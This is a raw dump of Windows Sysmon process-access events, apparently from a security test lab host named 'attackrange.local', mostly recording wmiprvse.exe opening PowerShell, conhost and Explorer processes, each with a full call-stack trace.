16:52:52.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-75AA-00000000AD01}3024C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.231{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-73AA-00000000AD01}10076C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 